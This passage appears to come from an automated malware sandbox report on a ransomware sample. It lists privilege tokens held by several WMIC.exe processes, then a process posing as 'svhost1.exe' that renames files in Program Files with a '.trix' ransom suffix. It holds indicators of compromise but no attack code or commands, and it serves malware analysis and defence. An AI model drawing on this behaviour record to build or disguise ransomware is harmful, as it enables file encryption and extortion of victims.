SeIncreaseQuotaPrivilege 2012 WMIC.exe Token: SeSecurityPrivilege 2012 WMIC.exe Token: SeTakeOwnershipPrivilege 2012 WMIC.exe Token: SeLoadDriverPrivilege 2012 WMIC.exe Token: SeSystemProfilePrivilege 2012 WMIC.exe Token: SeSystemtimePrivilege 2012 WMIC.exe Token: SeProfSingleProcessPrivilege 2012 WMIC.exe Token: SeIncBasePriorityPrivilege 2012 WMIC.exe Token: SeCreatePagefilePrivilege 2012 WMIC.exe Token: SeBackupPrivilege 2012 WMIC.exe Token: SeRestorePrivilege 2012 WMIC.exe Token: SeShutdownPrivilege 2012 WMIC.exe Token: SeDebugPrivilege 2012 WMIC.exe Token: SeSystemEnvironmentPrivilege 2012 WMIC.exe Token: SeRemoteShutdownPrivilege 2012 WMIC.exe Token: SeUndockPrivilege 2012 WMIC.exe Token: SeManageVolumePrivilege 2012 WMIC.exe Token: 33 2012 WMIC.exe Token: 34 2012 WMIC.exe Token: 35 2012 WMIC.exe Token: SeIncreaseQuotaPrivilege 1456 WMIC.exe Token: SeSecurityPrivilege 1456 WMIC.exe Token: SeTakeOwnershipPrivilege 1456 WMIC.exe Token: SeLoadDriverPrivilege 1456 WMIC.exe Token: SeSystemProfilePrivilege 1456 WMIC.exe Token: SeSystemtimePrivilege 1456 WMIC.exe Token: SeProfSingleProcessPrivilege 1456 WMIC.exe Token: SeIncBasePriorityPrivilege 1456 WMIC.exe Token: SeCreatePagefilePrivilege 1456 WMIC.exe Token: SeBackupPrivilege 1456 WMIC.exe Token: SeRestorePrivilege 1456 WMIC.exe Token: SeShutdownPrivilege 1456 WMIC.exe Token: SeDebugPrivilege 1456 WMIC.exe Token: SeSystemEnvironmentPrivilege 1456 WMIC.exe Token: SeRemoteShutdownPrivilege 1456 WMIC.exe Token: SeUndockPrivilege 1456 WMIC.exe Token: SeManageVolumePrivilege 1456 WMIC.exe Token: 33 1456 WMIC.exe Token: 34 1456 WMIC.exe Token: 35 1456 WMIC.exe Token: SeIncreaseQuotaPrivilege 1456 WMIC.exe Token: SeSecurityPrivilege 1456 WMIC.exe Token: SeTakeOwnershipPrivilege 1456 WMIC.exe Token: SeLoadDriverPrivilege 1456 WMIC.exe Token: SeSystemProfilePrivilege 1456 WMIC.exe Token: SeSystemtimePrivilege 1456 WMIC.exe Token: SeProfSingleProcessPrivilege 1456 WMIC.exe Token: SeIncBasePriorityPrivilege 1456 WMIC.exe Token: SeCreatePagefilePrivilege 1456 WMIC.exe Token: SeBackupPrivilege 1456 WMIC.exe Token: SeRestorePrivilege 1456 WMIC.exe Token: SeShutdownPrivilege 1456 WMIC.exe Token: SeDebugPrivilege 1456 WMIC.exe Token: SeSystemEnvironmentPrivilege 1456 WMIC.exe Token: SeRemoteShutdownPrivilege 1456 WMIC.exe Token: SeUndockPrivilege 1456 WMIC.exe Token: SeManageVolumePrivilege 1456 WMIC.exe Token: 33 1456 WMIC.exe Token: 34 1456 WMIC.exe Token: 35 1456 WMIC.exe Token: SeIncreaseQuotaPrivilege 596 WMIC.exe Token: SeSecurityPrivilege 596 WMIC.exe Token: SeTakeOwnershipPrivilege 596 WMIC.exe Token: SeLoadDriverPrivilege 596 WMIC.exe Token: SeSystemProfilePrivilege 596 WMIC.exe Token: SeSystemtimePrivilege 596 WMIC.exe Token: SeProfSingleProcessPrivilege 596 WMIC.exe Token: SeIncBasePriorityPrivilege 596 WMIC.exe Token: SeCreatePagefilePrivilege 596 WMIC.exe Token: SeBackupPrivilege 596 WMIC.exe Token: SeRestorePrivilege 596 WMIC.exe Token: SeShutdownPrivilege 596 WMIC.exe Token: SeDebugPrivilege 596 WMIC.exe Token: SeSystemEnvironmentPrivilege 596 WMIC.exe Token: SeRemoteShutdownPrivilege 596 WMIC.exe Token: SeUndockPrivilege 596 WMIC.exe Token: SeManageVolumePrivilege 596 WMIC.exe Token: 33 596 WMIC.exe Token: 34 596 WMIC.exe Token: 35 596 WMIC.exe Token: SeIncreaseQuotaPrivilege 596 WMIC.exe Token: SeSecurityPrivilege 596 WMIC.exe Token: SeTakeOwnershipPrivilege 596 WMIC.exe Token: SeLoadDriverPrivilege 596 WMIC.exe Token: SeSystemProfilePrivilege 596 WMIC.exe Token: SeSystemtimePrivilege 596 WMIC.exe Token: SeProfSingleProcessPrivilege 596 WMIC.exe Token: SeIncBasePriorityPrivilege 596 WMIC.exe Token: SeCreatePagefilePrivilege 596 WMIC.exe Token: SeBackupPrivilege 596 WMIC.exe Token: SeRestorePrivilege 596 WMIC.exe Token: SeShutdownPrivilege 596 WMIC.exe Token: SeDebugPrivilege 596 WMIC.exe Token: SeSystemEnvironmentPrivilege 596 WMIC.exe Token: SeRemoteShutdownPrivilege 596 WMIC.exe Token: SeUndockPrivilege 596 WMIC.exe Token: SeManageVolumePrivilege 596 WMIC.exe Token: 33 596 WMIC.exe Token: 34 596 WMIC.exe Token: 35 596 WMIC.exe Token: SeIncreaseQuotaPrivilege 528 WMIC.exe Token: SeSecurityPrivilege 528 WMIC.exe Token: SeTakeOwnershipPrivilege 528 WMIC.exe Token: SeLoadDriverPrivilege 528 WMIC.exe Token: SeSystemProfilePrivilege 528 WMIC.exe Token: SeSystemtimePrivilege 528 WMIC.exe Token: SeProfSingleProcessPrivilege 528 WMIC.exe Token: SeIncBasePriorityPrivilege 528 WMIC.exe Token: SeCreatePagefilePrivilege 528 WMIC.exe Token: SeBackupPrivilege 528 WMIC.exe Token: SeRestorePrivilege 528 WMIC.exe Token: SeShutdownPrivilege 528 WMIC.exe Token: SeDebugPrivilege 528 WMIC.exe Token: SeSystemEnvironmentPrivilege 528 WMIC.exe Token: SeRemoteShutdownPrivilege 528 WMIC.exe Token: SeUndockPrivilege 528 WMIC.exe Token: SeManageVolumePrivilege 528 WMIC.exe Token: 33 528 WMIC.exe Token: 34 528 WMIC.exe Token: 35 528 WMIC.exe Token: SeIncreaseQuotaPrivilege 528 WMIC.exe Token: SeSecurityPrivilege 528 WMIC.exe Token: SeTakeOwnershipPrivilege 528 WMIC.exe Token: SeLoadDriverPrivilege 528 WMIC.exe Token: SeSystemProfilePrivilege 528 WMIC.exe Token: SeSystemtimePrivilege 528 WMIC.exe Token: SeProfSingleProcessPrivilege 528 WMIC.exe Token: SeIncBasePriorityPrivilege 528 WMIC.exe Token: SeCreatePagefilePrivilege 528 WMIC.exe Token: SeBackupPrivilege 528 WMIC.exe Token: SeRestorePrivilege 528 WMIC.exe Token: SeShutdownPrivilege 528 WMIC.exe Token: SeDebugPrivilege 528 WMIC.exe Token: SeSystemEnvironmentPrivilege 528 WMIC.exe Token: SeRemoteShutdownPrivilege 528 WMIC.exe Token: SeUndockPrivilege 528 WMIC.exe Token: SeManageVolumePrivilege 528 WMIC.exe Token: 33 528 WMIC.exe Token: 34 528 WMIC.exe Token: 35 528 WMIC.exe Token: SeIncreaseQuotaPrivilege 204 WMIC.exe Token: SeSecurityPrivilege 204 WMIC.exe Token: SeTakeOwnershipPrivilege 204 WMIC.exe Token: SeLoadDriverPrivilege 204 WMIC.exe Token: SeSystemProfilePrivilege 204 WMIC.exe Token: SeSystemtimePrivilege 204 WMIC.exe Token: SeProfSingleProcessPrivilege 204 WMIC.exe Token: SeIncBasePriorityPrivilege 204 WMIC.exe Token: SeCreatePagefilePrivilege 204 WMIC.exe Token: SeBackupPrivilege 204 WMIC.exe Token: SeRestorePrivilege 204 WMIC.exe Token: SeShutdownPrivilege 204 WMIC.exe Token: SeDebugPrivilege 204 WMIC.exe Token: SeSystemEnvironmentPrivilege 204 WMIC.exe Token: SeRemoteShutdownPrivilege 204 WMIC.exe Token: SeUndockPrivilege 204 WMIC.exe Token: SeManageVolumePrivilege 204 WMIC.exe Token: 33 204 WMIC.exe Token: 34 204 WMIC.exe Token: 35 204 WMIC.exe Token: SeIncreaseQuotaPrivilege 204 WMIC.exe Token: SeSecurityPrivilege 204 WMIC.exe Token: SeTakeOwnershipPrivilege 204 WMIC.exe Token: SeLoadDriverPrivilege 204 WMIC.exe Token: SeSystemProfilePrivilege 204 WMIC.exe Token: SeSystemtimePrivilege 204 WMIC.exe Token: SeProfSingleProcessPrivilege 204 WMIC.exe Token: SeIncBasePriorityPrivilege 204 WMIC.exe Token: SeCreatePagefilePrivilege 204 WMIC.exe Token: SeBackupPrivilege 204 WMIC.exe Token: SeRestorePrivilege 204 WMIC.exe Token: SeShutdownPrivilege 204 WMIC.exe Token: SeDebugPrivilege 204 WMIC.exe Token: SeSystemEnvironmentPrivilege 204 WMIC.exe Token: SeRemoteShutdownPrivilege 204 WMIC.exe Token: SeUndockPrivilege 204 WMIC.exe Token: SeManageVolumePrivilege 204 WMIC.exe Token: 33 204 WMIC.exe Token: 34 204 WMIC.exe Token: 35 204 WMIC.exe Token: SeIncreaseQuotaPrivilege 1488 WMIC.exe Token: SeSecurityPrivilege 1488 WMIC.exe Token: SeTakeOwnershipPrivilege 1488 WMIC.exe Token: SeLoadDriverPrivilege 1488 WMIC.exe Token: SeSystemProfilePrivilege 1488 WMIC.exe Token: SeSystemtimePrivilege 1488 WMIC.exe Token: SeProfSingleProcessPrivilege 1488 WMIC.exe Token: SeIncBasePriorityPrivilege 1488 WMIC.exe Token: SeCreatePagefilePrivilege 1488 WMIC.exe Token: SeBackupPrivilege 1488 WMIC.exe Token: SeRestorePrivilege 1488 WMIC.exe Token: SeShutdownPrivilege 1488 WMIC.exe Token: SeDebugPrivilege 1488 WMIC.exe Token: SeSystemEnvironmentPrivilege 1488 WMIC.exe Token: SeRemoteShutdownPrivilege 1488 WMIC.exe Token: SeUndockPrivilege 1488 WMIC.exe Token: SeManageVolumePrivilege 1488 WMIC.exe Token: 33 1488 WMIC.exe Token: 34 1488 WMIC.exe Token: 35 1488 WMIC.exe Token: SeIncreaseQuotaPrivilege 1488 WMIC.exe Token: SeSecurityPrivilege 1488 WMIC.exe Token: SeTakeOwnershipPrivilege 1488 WMIC.exe Token: SeLoadDriverPrivilege 1488 WMIC.exe Token: SeSystemProfilePrivilege 1488 WMIC.exe Token: SeSystemtimePrivilege 1488 WMIC.exe Token: SeProfSingleProcessPrivilege 1488 WMIC.exe Token: SeIncBasePriorityPrivilege 1488 WMIC.exe Token: SeCreatePagefilePrivilege 1488 WMIC.exe Token: SeBackupPrivilege 1488 WMIC.exe Token: SeRestorePrivilege 1488 WMIC.exe Token: SeShutdownPrivilege 1488 WMIC.exe Token: SeDebugPrivilege 1488 WMIC.exe Token: SeSystemEnvironmentPrivilege 1488 WMIC.exe Token: SeRemoteShutdownPrivilege 1488 WMIC.exe Token: SeUndockPrivilege 1488 WMIC.exe Token: SeManageVolumePrivilege 1488 WMIC.exe Token: 33 1488 WMIC.exe Token: 34 1488 WMIC.exe Token: 35 1488 WMIC.exe Token: SeIncreaseQuotaPrivilege 1580 WMIC.exe Token: SeSecurityPrivilege 1580 WMIC.exe Token: SeTakeOwnershipPrivilege 1580 WMIC.exe Token: SeLoadDriverPrivilege 1580 WMIC.exe Token: SeSystemProfilePrivilege 1580 WMIC.exe Token: SeSystemtimePrivilege 1580 WMIC.exe Token: SeProfSingleProcessPrivilege 1580 WMIC.exe Token: SeIncBasePriorityPrivilege 1580 WMIC.exe Token: SeCreatePagefilePrivilege 1580 WMIC.exe Token: SeBackupPrivilege 1580 WMIC.exe Token: SeRestorePrivilege 1580 WMIC.exe Token: SeShutdownPrivilege 1580 WMIC.exe Token: SeDebugPrivilege 1580 WMIC.exe Token: SeSystemEnvironmentPrivilege 1580 WMIC.exe Token: SeRemoteShutdownPrivilege 1580 WMIC.exe Token: SeUndockPrivilege 1580 WMIC.exe Token: SeManageVolumePrivilege 1580 WMIC.exe Token: 33 1580 WMIC.exe Token: 34 1580 WMIC.exe Token: 35 1580 WMIC.exe Token: SeIncreaseQuotaPrivilege 1580 WMIC.exe Token: SeSecurityPrivilege 1580 WMIC.exe Token: SeTakeOwnershipPrivilege 1580 WMIC.exe Token: SeLoadDriverPrivilege 1580 WMIC.exe Token: SeSystemProfilePrivilege 1580 WMIC.exe Token: SeSystemtimePrivilege 1580 WMIC.exe Token: SeProfSingleProcessPrivilege 1580 WMIC.exe Token: SeIncBasePriorityPrivilege 1580 WMIC.exe Token: SeCreatePagefilePrivilege 1580 WMIC.exe Token: SeBackupPrivilege 1580 WMIC.exe Token: SeRestorePrivilege 1580 WMIC.exe Token: SeShutdownPrivilege 1580 WMIC.exe Token: SeDebugPrivilege 1580 WMIC.exe Token: SeSystemEnvironmentPrivilege 1580 WMIC.exe Token: SeRemoteShutdownPrivilege 1580 WMIC.exe Token: SeUndockPrivilege 1580 WMIC.exe Token: SeManageVolumePrivilege 1580 WMIC.exe Token: 33 1580 WMIC.exe Token: 34 1580 WMIC.exe Token: 35 1580 WMIC.exe Token: SeIncreaseQuotaPrivilege 1608 WMIC.exe Token: SeSecurityPrivilege 1608 WMIC.exe Token: SeTakeOwnershipPrivilege 1608 WMIC.exe Token: SeLoadDriverPrivilege 1608 WMIC.exe Token: SeSystemProfilePrivilege 1608 WMIC.exe Token: SeSystemtimePrivilege 1608 WMIC.exe Token: SeProfSingleProcessPrivilege 1608 WMIC.exe Token: SeIncBasePriorityPrivilege 1608 WMIC.exe Token: SeCreatePagefilePrivilege 1608 WMIC.exe Token: SeBackupPrivilege 1608 WMIC.exe Token: SeRestorePrivilege 1608 WMIC.exe Token: SeShutdownPrivilege 1608 WMIC.exe Token: SeDebugPrivilege 1608 WMIC.exe Token: SeSystemEnvironmentPrivilege 1608 WMIC.exe Token: SeRemoteShutdownPrivilege 1608 WMIC.exe Token: SeUndockPrivilege 1608 WMIC.exe Token: SeManageVolumePrivilege 1608 WMIC.exe Token: 33 1608 WMIC.exe Token: 34 1608 WMIC.exe Token: 35 1608 WMIC.exe Token: SeIncreaseQuotaPrivilege 1608 WMIC.exe Token: SeSecurityPrivilege 1608 WMIC.exe Token: SeTakeOwnershipPrivilege 1608 WMIC.exe Token: SeLoadDriverPrivilege 1608 WMIC.exe Token: SeSystemProfilePrivilege 1608 WMIC.exe Token: SeSystemtimePrivilege 1608 WMIC.exe Token: SeProfSingleProcessPrivilege 1608 WMIC.exe Token: SeIncBasePriorityPrivilege 1608 WMIC.exe Token: SeCreatePagefilePrivilege 1608 WMIC.exe Token: SeBackupPrivilege 1608 WMIC.exe Token: SeRestorePrivilege 1608 WMIC.exe Token: SeShutdownPrivilege 1608 WMIC.exe Token: SeDebugPrivilege 1608 WMIC.exe Token: SeSystemEnvironmentPrivilege 1608 WMIC.exe Token: SeRemoteShutdownPrivilege 1608 WMIC.exe Token: SeUndockPrivilege 1608 WMIC.exe Token: SeManageVolumePrivilege 1608 WMIC.exe Token: 33 1608 WMIC.exe Token: 34 1608 WMIC.exe Token: 35 1608 WMIC.exe Token: SeIncreaseQuotaPrivilege 1560 WMIC.exe Token: SeSecurityPrivilege 1560 WMIC.exe Token: SeTakeOwnershipPrivilege 1560 WMIC.exe Token: SeLoadDriverPrivilege 1560 WMIC.exe Token: SeSystemProfilePrivilege 1560 WMIC.exe Token: SeSystemtimePrivilege 1560 WMIC.exe Token: SeProfSingleProcessPrivilege 1560 WMIC.exe Token: SeIncBasePriorityPrivilege 1560 WMIC.exe Token: SeCreatePagefilePrivilege 1560 WMIC.exe Token: SeBackupPrivilege 1560 WMIC.exe Token: SeRestorePrivilege 1560 WMIC.exe Token: SeShutdownPrivilege 1560 WMIC.exe Token: SeDebugPrivilege 1560 WMIC.exe Token: SeSystemEnvironmentPrivilege 1560 WMIC.exe Token: SeRemoteShutdownPrivilege 1560 WMIC.exe Token: SeUndockPrivilege 1560 WMIC.exe Token: SeManageVolumePrivilege 1560 WMIC.exe Token: 33 1560 WMIC.exe Token: 34 1560 WMIC.exe Token: 35 1560 WMIC.exe Token: SeIncreaseQuotaPrivilege 1560 WMIC.exe Token: SeSecurityPrivilege 1560 WMIC.exe Token: SeTakeOwnershipPrivilege 1560 WMIC.exe Token: SeLoadDriverPrivilege 1560 WMIC.exe Token: SeSystemProfilePrivilege 1560 WMIC.exe Token: SeSystemtimePrivilege 1560 WMIC.exe Token: SeProfSingleProcessPrivilege 1560 WMIC.exe Token: SeIncBasePriorityPrivilege 1560 WMIC.exe Token: SeCreatePagefilePrivilege 1560 WMIC.exe Token: SeBackupPrivilege 1560 WMIC.exe Token: SeRestorePrivilege 1560 WMIC.exe Token: SeShutdownPrivilege 1560 WMIC.exe Token: SeDebugPrivilege 1560 WMIC.exe Token: SeSystemEnvironmentPrivilege 1560 WMIC.exe Token: SeRemoteShutdownPrivilege 1560 WMIC.exe Token: SeUndockPrivilege 1560 WMIC.exe Token: SeManageVolumePrivilege 1560 WMIC.exe Token: 33 1560 WMIC.exe Token: 34 1560 WMIC.exe Token: 35 1560 WMIC.exe Token: SeIncreaseQuotaPrivilege 1848 WMIC.exe Token: SeSecurityPrivilege 1848 WMIC.exe Token: SeTakeOwnershipPrivilege 1848 WMIC.exe Token: SeLoadDriverPrivilege 1848 WMIC.exe Token: SeSystemProfilePrivilege 1848 WMIC.exe Token: SeSystemtimePrivilege 1848 WMIC.exe Token: SeProfSingleProcessPrivilege 1848 WMIC.exe Token: SeIncBasePriorityPrivilege 1848 WMIC.exe Token: SeCreatePagefilePrivilege 1848 WMIC.exe Token: SeBackupPrivilege 1848 WMIC.exe Token: SeRestorePrivilege 1848 WMIC.exe Token: SeShutdownPrivilege 1848 WMIC.exe Token: SeDebugPrivilege 1848 WMIC.exe Token: SeSystemEnvironmentPrivilege 1848 WMIC.exe Token: SeRemoteShutdownPrivilege 1848 WMIC.exe Token: SeUndockPrivilege 1848 WMIC.exe Token: SeManageVolumePrivilege 1848 WMIC.exe Token: 33 1848 WMIC.exe Token: 34 1848 WMIC.exe Token: 35 1848 WMIC.exe Token: SeIncreaseQuotaPrivilege 1848 WMIC.exe Token: SeSecurityPrivilege 1848 WMIC.exe Token: SeTakeOwnershipPrivilege 1848 WMIC.exe Token: SeLoadDriverPrivilege 1848 WMIC.exe Token: SeSystemProfilePrivilege 1848 WMIC.exe Token: SeSystemtimePrivilege 1848 WMIC.exe Token: SeProfSingleProcessPrivilege 1848 WMIC.exe Token: SeIncBasePriorityPrivilege 1848 WMIC.exe Token: SeCreatePagefilePrivilege 1848 WMIC.exe Token: SeBackupPrivilege 1848 WMIC.exe Token: SeRestorePrivilege 1848 WMIC.exe Token: SeShutdownPrivilege 1848 WMIC.exe Token: SeDebugPrivilege 1848 WMIC.exe Token: SeSystemEnvironmentPrivilege 1848 WMIC.exe Token: SeRemoteShutdownPrivilege 1848 WMIC.exe Token: SeUndockPrivilege 1848 WMIC.exe Token: SeManageVolumePrivilege 1848 WMIC.exe Token: 33 1848 WMIC.exe Token: 34 1848 WMIC.exe Token: 35 1848 WMIC.exe Token: SeIncreaseQuotaPrivilege 1888 WMIC.exe Token: SeSecurityPrivilege 1888 WMIC.exe Token: SeTakeOwnershipPrivilege 1888 WMIC.exe Token: SeLoadDriverPrivilege 1888 WMIC.exe Token: SeSystemProfilePrivilege 1888 WMIC.exe Token: SeSystemtimePrivilege 1888 WMIC.exe Token: SeProfSingleProcessPrivilege 1888 WMIC.exe Token: SeIncBasePriorityPrivilege 1888 WMIC.exe Token: SeCreatePagefilePrivilege 1888 WMIC.exe Token: SeBackupPrivilege 1888 WMIC.exe Token: SeRestorePrivilege 1888 WMIC.exe Token: SeShutdownPrivilege 1888 WMIC.exe Token: SeDebugPrivilege 1888 WMIC.exe Token: SeSystemEnvironmentPrivilege 1888 WMIC.exe Token: SeRemoteShutdownPrivilege 1888 WMIC.exe Token: SeUndockPrivilege 1888 WMIC.exe Token: SeManageVolumePrivilege 1888 WMIC.exe Token: 33 1888 WMIC.exe Token: 34 1888 WMIC.exe Token: 35 1888 WMIC.exe Token: SeIncreaseQuotaPrivilege 1888 WMIC.exe Token: SeSecurityPrivilege 1888 WMIC.exe Token: SeTakeOwnershipPrivilege 1888 WMIC.exe Token: SeLoadDriverPrivilege 1888 WMIC.exe Token: SeSystemProfilePrivilege 1888 WMIC.exe Token: SeSystemtimePrivilege 1888 WMIC.exe Token: SeProfSingleProcessPrivilege 1888 WMIC.exe Token: SeIncBasePriorityPrivilege 1888 WMIC.exe Token: SeCreatePagefilePrivilege 1888 WMIC.exe Token: SeBackupPrivilege 1888 WMIC.exe Token: SeRestorePrivilege 1888 WMIC.exe Token: SeShutdownPrivilege 1888 WMIC.exe Token: SeDebugPrivilege 1888 WMIC.exe Token: SeSystemEnvironmentPrivilege 1888 WMIC.exe Token: SeRemoteShutdownPrivilege 1888 WMIC.exe Token: SeUndockPrivilege 1888 WMIC.exe Token: SeManageVolumePrivilege 1888 WMIC.exe Token: 33 1888 WMIC.exe Token: 34 1888 WMIC.exe Token: 35 1888 WMIC.exe Token: SeIncreaseQuotaPrivilege 1924 WMIC.exe Token: SeSecurityPrivilege 1924 WMIC.exe Token: SeTakeOwnershipPrivilege 1924 WMIC.exe Token: SeLoadDriverPrivilege 1924 WMIC.exe Token: SeSystemProfilePrivilege 1924 WMIC.exe Token: SeSystemtimePrivilege 1924 WMIC.exe Token: SeProfSingleProcessPrivilege 1924 WMIC.exe Token: SeIncBasePriorityPrivilege 1924 WMIC.exe Token: SeCreatePagefilePrivilege 1924 WMIC.exe Token: SeBackupPrivilege 1924 WMIC.exe Token: SeRestorePrivilege 1924 WMIC.exe Token: SeShutdownPrivilege 1924 WMIC.exe Token: SeDebugPrivilege 1924 WMIC.exe Token: SeSystemEnvironmentPrivilege 1924 WMIC.exe Token: SeRemoteShutdownPrivilege 1924 WMIC.exe Token: SeUndockPrivilege 1924 WMIC.exe Token: SeManageVolumePrivilege 1924 WMIC.exe Token: 33 1924 WMIC.exe Token: 34 1924 WMIC.exe Token: 35 1924 WMIC.exe Token: SeIncreaseQuotaPrivilege 1924 WMIC.exe Token: SeSecurityPrivilege 1924 WMIC.exe Token: SeTakeOwnershipPrivilege 1924 WMIC.exe Token: SeLoadDriverPrivilege 1924 WMIC.exe Token: SeSystemProfilePrivilege 1924 WMIC.exe Token: SeSystemtimePrivilege 1924 WMIC.exe Token: SeProfSingleProcessPrivilege 1924 WMIC.exe Token: SeIncBasePriorityPrivilege 1924 WMIC.exe Token: SeCreatePagefilePrivilege 1924 WMIC.exe Token: SeBackupPrivilege 1924 WMIC.exe Token: SeRestorePrivilege 1924 WMIC.exe Token: SeShutdownPrivilege 1924 WMIC.exe Token: SeDebugPrivilege 1924 WMIC.exe Token: SeSystemEnvironmentPrivilege 1924 WMIC.exe Token: SeRemoteShutdownPrivilege 1924 WMIC.exe Token: SeUndockPrivilege 1924 WMIC.exe Token: SeManageVolumePrivilege 1924 WMIC.exe Token: 33 1924 WMIC.exe Token: 34 1924 WMIC.exe Token: 35 1924 WMIC.exe Token: SeIncreaseQuotaPrivilege 1980 WMIC.exe Token: SeSecurityPrivilege 1980 WMIC.exe Token: SeTakeOwnershipPrivilege 1980 WMIC.exe Token: SeLoadDriverPrivilege 1980 WMIC.exe Token: SeSystemProfilePrivilege 1980 WMIC.exe Token: SeSystemtimePrivilege 1980 WMIC.exe Token: SeProfSingleProcessPrivilege 1980 WMIC.exe Token: SeIncBasePriorityPrivilege 1980 WMIC.exe Token: SeCreatePagefilePrivilege 1980 WMIC.exe Token: SeBackupPrivilege 1980 WMIC.exe Token: SeRestorePrivilege 1980 WMIC.exe Token: SeShutdownPrivilege 1980 WMIC.exe Token: SeDebugPrivilege 1980 WMIC.exe Token: SeSystemEnvironmentPrivilege 1980 WMIC.exe Token: SeRemoteShutdownPrivilege 1980 WMIC.exe Token: SeUndockPrivilege 1980 WMIC.exe Token: SeManageVolumePrivilege 1980 WMIC.exe Token: 33 1980 WMIC.exe Token: 34 1980 WMIC.exe Token: 35 1980 WMIC.exe Token: SeIncreaseQuotaPrivilege 1980 WMIC.exe Token: SeSecurityPrivilege 1980 WMIC.exe Token: SeTakeOwnershipPrivilege 1980 WMIC.exe Token: SeLoadDriverPrivilege 1980 WMIC.exe Token: SeSystemProfilePrivilege 1980 WMIC.exe Token: SeSystemtimePrivilege 1980 WMIC.exe Token: SeProfSingleProcessPrivilege 1980 WMIC.exe Token: SeIncBasePriorityPrivilege 1980 WMIC.exe Token: SeCreatePagefilePrivilege 1980 WMIC.exe Token: SeBackupPrivilege 1980 WMIC.exe Token: SeRestorePrivilege 1980 WMIC.exe Token: SeShutdownPrivilege 1980 WMIC.exe Token: SeDebugPrivilege 1980 WMIC.exe Token: SeSystemEnvironmentPrivilege 1980 WMIC.exe Token: SeRemoteShutdownPrivilege 1980 WMIC.exe Token: SeUndockPrivilege 1980 WMIC.exe Token: SeManageVolumePrivilege 1980 WMIC.exe Token: 33 1980 WMIC.exe Token: 34 1980 WMIC.exe Token: 35 1980 WMIC.exe Token: SeIncreaseQuotaPrivilege 576 WMIC.exe Token: SeSecurityPrivilege 576 WMIC.exe Token: SeTakeOwnershipPrivilege 576 WMIC.exe Token: SeLoadDriverPrivilege 576 WMIC.exe Token: SeSystemProfilePrivilege 576 WMIC.exe Token: SeSystemtimePrivilege 576 WMIC.exe Token: SeProfSingleProcessPrivilege 576 WMIC.exe Token: SeIncBasePriorityPrivilege 576 WMIC.exe Token: SeCreatePagefilePrivilege 576 WMIC.exe Token: SeBackupPrivilege 576 WMIC.exe Token: SeRestorePrivilege 576 WMIC.exe Token: SeShutdownPrivilege 576 WMIC.exe Token: SeDebugPrivilege 576 WMIC.exe Token: SeSystemEnvironmentPrivilege 576 WMIC.exe Token: SeRemoteShutdownPrivilege 576 WMIC.exe Token: SeUndockPrivilege 576 WMIC.exe Token: SeManageVolumePrivilege 576 WMIC.exe Token: 33 576 WMIC.exe Token: 34 576 WMIC.exe Token: 35 576 WMIC.exe Token: SeIncreaseQuotaPrivilege 576 WMIC.exe Token: SeSecurityPrivilege 576 WMIC.exe Token: SeTakeOwnershipPrivilege 576 WMIC.exe Token: SeLoadDriverPrivilege 576 WMIC.exe Token: SeSystemProfilePrivilege 576 WMIC.exe Token: SeSystemtimePrivilege 576 WMIC.exe Token: SeProfSingleProcessPrivilege 576 WMIC.exe Token: SeIncBasePriorityPrivilege 576 WMIC.exe Token: SeCreatePagefilePrivilege 576 WMIC.exe Token: SeBackupPrivilege 576 WMIC.exe Token: SeRestorePrivilege 576 WMIC.exe Token: SeShutdownPrivilege 576 WMIC.exe Token: SeDebugPrivilege 576 WMIC.exe Token: SeSystemEnvironmentPrivilege 576 WMIC.exe Token: SeRemoteShutdownPrivilege 576 WMIC.exe Token: SeUndockPrivilege 576 WMIC.exe Token: SeManageVolumePrivilege 576 WMIC.exe Token: 33 576 WMIC.exe Token: 34 576 WMIC.exe Token: 35 576 WMIC.exe -
Drops file in Program Files directory 100 IoCs
description ioc Process File opened for modification C:\Program Files\desktop.ini svhost1.exe File created C:\Program Files\UnprotectCompare.ppsx_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\Internet Explorer\F12Resources.dll_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\iedvtool.dll svhost1.exe File opened for modification C:\Program Files\Internet Explorer\msdbg2.dll svhost1.exe File opened for modification C:\Program Files\Internet Explorer\D3DCompiler_47.dll svhost1.exe File opened for modification C:\Program Files\Internet Explorer\ielowutil.exe svhost1.exe File opened for modification C:\Program Files\Internet Explorer\IEShims.dll svhost1.exe File created C:\Program Files\Internet Explorer\JSProfilerCore.dll_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\InstallBackup.cab svhost1.exe File created C:\Program Files\UnpublishRestore.xps_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\Internet Explorer\iedvtool.dll_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\JSProfilerCore.dll svhost1.exe File created C:\Program Files\Internet Explorer\perfcore.dll_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\7-Zip\7z.dll_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\BlockImport.xhtml svhost1.exe File created C:\Program Files\NewRevoke.bin_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\pdmproxy100.dll svhost1.exe File created C:\Program Files\Internet Explorer\Timeline.cpu.xml_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\Timeline.cpu.xml svhost1.exe File opened for modification C:\Program Files\Internet Explorer\Timeline_is.dll svhost1.exe File created C:\Program Files\Internet Explorer\msdbg2.dll_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\ConvertFromCheckpoint.js svhost1.exe File opened for modification C:\Program Files\MergeSet.xlsx svhost1.exe File created C:\Program Files\Internet Explorer\ieinstal.exe_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\Internet Explorer\IEShims.dll_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\Internet Explorer\jsprofilerui.dll_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\jsprofilerui.dll svhost1.exe File opened for modification C:\Program Files\Internet Explorer\F12Resources.dll svhost1.exe File created C:\Program Files\Internet Explorer\networkinspection.dll_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\Internet Explorer\Timeline.dll_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\7-Zip\7-zip.chm_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\7-Zip\7-zip32.dll_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\OutRequest.ini_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\RequestImport.cmd_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program 